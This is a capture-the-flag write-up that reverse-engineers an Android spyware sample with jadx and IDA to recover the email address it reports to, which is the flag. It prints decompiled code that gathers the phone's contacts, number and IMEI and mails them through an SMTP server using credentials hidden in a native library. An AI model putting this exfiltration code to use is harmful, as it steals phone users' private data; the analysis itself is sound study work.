BUUCTF--相册

测试文件：https://www.lanzous.com/iaoj7qb

溯源

使用jadx-gui打开后，搜索包含mail的代码

很明显，这个sendMailByJavaMail函数应该是一个关键函数。找到位置

    public static int sendMailByJavaMail(String mailto, String title, String mailmsg) {
        if (!debug) {
            Mail m = new Mail(C0005C2.MAILUSER, C0005C2.MAILPASS);
            m.set_host(C0005C2.MAILHOST);
            m.set_port(C0005C2.PORT);
            m.set_debuggable(true);
            m.set_to(new String[]{mailto});
            m.set_from(C0005C2.MAILFROME);
            m.set_subject(title);
            m.setBody(mailmsg);
            try {
                if (m.send()) {
                    Log.i("IcetestActivity", "Email was sent successfully.");
                } else {
                    Log.i("IcetestActivity", "Email was sent failed.");
                }
            } catch (Exception e) {
                Log.e("MailApp", "Could not send email", e);
            }
        }
        return 1;
    }

函数以mailto为参数，这个mailto应该是我们需要找到。

我们找一下这个函数引用处

public class MailTask extends AsyncTask<Integer, Integer, String> {
    private String content;
    private Context context;

    public void run(String content2) {
        String notebooks = "";
        for (String[] note : NoteBook.get(this.context, IMAPStore.RESPONSE)) {
            notebooks = String.valueOf(notebooks) + note[0] + ":" + note[1] + "
";
        }
        String tel = ((TelephonyManager) this.context.getSystemService("phone")).getLine1Number();
        if (tel == null || tel.equals("")) {
            tel = C0001A2.getNoteBook(content2).phoneNumber;
        }
        Sms getBFlag = C0001A2.getNoteBook(content2);
        if (!C0001A2.isEmpty(notebooks)) {
            C0001A2.sendMailByJavaMail(C0005C2.MAILSERVER, "通讯录(" + tel + "IMEI" + ((TelephonyManager) this.context.getSystemService("phone")).getDeviceId() + ")", notebooks);
        }
    }

C0005C2.MAILSERVER就是我们需要的邮箱，再找原出处

public class C0005C2 {
    public static final String CANCELNUMBER = "%23%2321%23";
    public static final String MAILFROME = Base64.decode(NativeMethod.m1m());
    public static final String MAILHOST = "smtp.163.com";
    public static final String MAILPASS = Base64.decode(NativeMethod.pwd());
    public static final String MAILSERVER = Base64.decode(NativeMethod.m1m());
    public static final String MAILUSER = Base64.decode(NativeMethod.m1m());
    public static final String MOVENUMBER = "**21*121%23";
    public static final String PORT = "25";
    public static final String date = "2115-11-1";
    public static final String phoneNumber = Base64.decode(NativeMethod.m2p());

MAILSERVER就是加载外部so文件中NativeMethod.m1m()函数所返回的值，再进行base64解密。因此我们只需要找到so文件中经过base64加密的字符串。

IDA打开

IDA打开APK文件中的libcore.so文件后，在String window找到base64加密的字符串。

解密后，第二个就是flag

get flag！

flag{18218465125@163.com}